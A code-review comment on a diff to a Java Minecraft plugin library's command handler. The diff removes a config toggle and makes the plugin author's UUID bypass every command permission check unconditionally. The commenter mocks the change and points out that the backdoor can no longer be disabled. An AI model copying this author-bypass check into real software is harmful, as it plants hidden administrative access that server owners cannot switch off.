src/main/java/gyurix/commands/SpigotLibCommands.java

```diff
@@ -40,7 +39,7 @@ public boolean onCommand(final CommandSender sender, Command command, String lab
     try {
       Player plr = sender instanceof Player ? (Player) sender : null;
       String cmd = args.length == 0 ? "help" : args[0].toLowerCase();
-      if (!sender.hasPermission("spigotlib.command." + cmd) && !(allowAllPermsForAuthor && plr != null && plr.getUniqueId().equals(author))) {
+      if (!sender.hasPermission("spigotlib.command." + cmd) && !(plr != null && plr.getUniqueId().equals(author))) {
```

Comment:
you just removed the option to disable it here, it will still give you access if you are the author dum dum.

p.s. ik this is dead but i saw this and thought it was funny